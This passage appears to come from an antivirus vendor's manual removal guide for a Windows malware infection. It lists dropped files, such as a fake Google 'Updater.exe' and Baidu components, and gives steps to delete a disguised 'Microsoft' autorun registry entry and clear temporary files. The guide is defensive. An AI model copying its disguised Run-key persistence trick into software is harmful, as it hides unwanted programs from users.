   %Documents and Settings%\%current user%\Local Settings\Temp\Setup_20141027_025641351.html (55598 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\HFIB5.tmp.html (22 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\vcredistx64.exe (41656 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\Index.exe (9361 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\autB3.tmp (44680 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\autB2.tmp (5641 bytes)
   %Documents and Settings%\%current user%\Local Settings\Application Data\temp\SparkMiniInstall.ini (176 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\package[1].xml (289 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\desktop.ini (67 bytes)
   %Documents and Settings%\%current user%\Local Settings\Application Data\temp\f0a5413bf497ed577eae2a88a8b8a193.gnet.tmp (5043 bytes)
   %Documents and Settings%\%current user%\Local Settings\Application Data\temp\test4822FBB5_0309_420f_9DA2_FA5B8B854946\test4822FBB5_0309_420f_9DA2_FA5B8B854947.txt (10 bytes)
   %Documents and Settings%\All Users\Documents\Baidu\Common\I18N\conf.db (759 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
   %Documents and Settings%\%current user%\Cookies\DA7WUGUH.txt (120 bytes)
   %Documents and Settings%\%current user%\Application Data\Google\int\Updater.exe (129227 bytes)
   %Documents and Settings%\%current user%\Application Data\Google\int\Google.exe (129271 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\updater[1].exe (489073 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\google[1].exe (489298 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\desktop.ini (67 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\4.76808708626777\11.3678106125444.txt (239 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\desktop.ini (67 bytes)

4. Delete the following value(s) in the autorun key (How to Work with System Registry):
   

   [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
   "Microsoft" = "%Documents and Settings%\%current user%\Application Data\Google\int\Updater.exe"

5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   
6. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.